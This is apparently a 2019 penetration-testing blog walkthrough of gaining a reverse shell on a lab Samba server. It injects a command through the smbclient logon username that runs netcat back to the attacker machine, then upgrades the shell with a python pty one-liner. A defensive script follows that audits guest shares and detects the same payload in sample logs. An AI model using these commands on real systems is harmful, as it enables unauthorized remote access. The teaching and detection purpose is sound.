Exploiting SMB (Samba) without Metasploit, series 1

MrNmap
May 13, 2019


This post is about exploiting SMB (port 445) running on a remote Linux system. Our goal is to take remote access via an unprotected Samba server without using any exploitation tool or framework.

Prerequisites

How to use netcat

smbclient

Step 1. Scan the target machine and check for an open SMB port; in my case the target IP is 192.168.1.134.

Target m/c → 192.168.1.134

Attacker m/c → 192.168.1.129 (kali linux)

Kindly note that all tasks have been performed from the attacker machine 192.168.1.129.

Use smbclient to list the shares and check for anonymous access:

smbclient -L 192.168.1.134

{the password is nothing, just hit enter}

Since we know that the "tmp" share is present and allows anonymous access to the system,

let's open netcat in terminal 1 to accept the reverse connection:

nc -lvp 7777

In terminal 2, connect directly to the tmp share on the Samba server using:

smbclient //192.168.1.134/tmp

Type the help command in terminal 2.

Since the logon command is available, we can make the reverse connection using it (the port must match the one netcat is listening on in terminal 1):

logon "/=`nc <attack box ip> 7777 -e /bin/bash`"

In terminal 1 you will get the reverse shell.

Type the following command in terminal 1 to upgrade the shell to an interactive terminal:

python -c "import pty; pty.spawn('/bin/bash')"

Now you have a reverse connection into your attacker machine with interactive terminal access.
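From the defender's side, the walkthrough above exposes two things worth checking on any Samba host: a share that is reachable anonymously (the "tmp" share listed with no password), and a username field that carries shell metacharacters such as backticks (the logon command). The following script is an added example, not code from this post or from the Samba project. It audits a constructed smb.conf excerpt for guest-accessible shares and flags authentication records whose username contains shell metacharacters. The smb.conf text and the auth log lines are constructed for the example, and the log line format (user="..." from=...) is an assumed format, not Samba's real log layout.

```python
import re

# Constructed smb.conf excerpt for the example (not taken from any real host).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
   browseable = yes

[homes]
   path = /home
   guest ok = no
   read only = yes
"""

# Constructed authentication records in an assumed "user=... from=..." format.
SAMPLE_AUTH_LOG = [
    '2019-05-13T10:01:02 smbd auth user="alice" from=192.168.1.50 result=NT_STATUS_OK',
    '2019-05-13T10:01:09 smbd auth user="bob" from=192.168.1.51 result=NT_STATUS_LOGON_FAILURE',
    '2019-05-13T10:02:31 smbd auth user="/=`nc 192.168.1.129 7777 -e /bin/bash`" from=192.168.1.129 result=NT_STATUS_OK',
]

TRUTHY = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}} with lower-cased names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def share_is_guest(opts):
    # "public" is Samba's synonym for "guest ok".
    value = opts.get("guest ok", opts.get("public", "no"))
    return value.lower() in TRUTHY


def share_is_writable(opts):
    # "writable", "writeable" and "write ok" are synonyms; "read only" is the inverse.
    for key in ("writable", "writeable", "write ok"):
        if key in opts:
            return opts[key].lower() in TRUTHY
    if "read only" in opts:
        return opts["read only"].lower() not in TRUTHY
    return False  # Samba shares are read only unless configured otherwise


def audit_smb_conf(text):
    """Return {share: finding} for every share that anonymous users can reach."""
    findings = {}
    for share, opts in parse_smb_conf(text).items():
        if share == "global":
            continue
        if share_is_guest(opts):
            findings[share] = "guest-writable" if share_is_writable(opts) else "guest-readable"
    return findings


# Username field in the assumed log format, then shell metacharacters that
# should never appear in a legitimate account name.
USER_RE = re.compile(r'user="([^"]*)"')
METACHAR_RE = re.compile(r"[`$;|&<>]")


def flag_suspicious_usernames(log_lines):
    """Return (line_number, username) for records whose username looks like a command."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = USER_RE.search(line)
        if match and METACHAR_RE.search(match.group(1)):
            hits.append((number, match.group(1)))
    return hits


if __name__ == "__main__":
    for share, finding in audit_smb_conf(SAMPLE_SMB_CONF).items():
        print(f"share [{share}] is {finding}")
    for number, user in flag_suspicious_usernames(SAMPLE_AUTH_LOG):
        print(f"line {number}: suspicious username {user!r}")
```

Run against a real smb.conf, a guest-writable share is the finding to remove first (set guest ok = no, or read only = yes if anonymous read access is intended); the username check is meant to run over the server's authentication log and raise an alert on the first hit rather than be applied after the fact.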

Please feel free to contact me in case of any query: nmapp@gmail.com


MrNmap

Security Engineer | Penetration Tester | Red Team | Telecom Security | 5G security | Speaker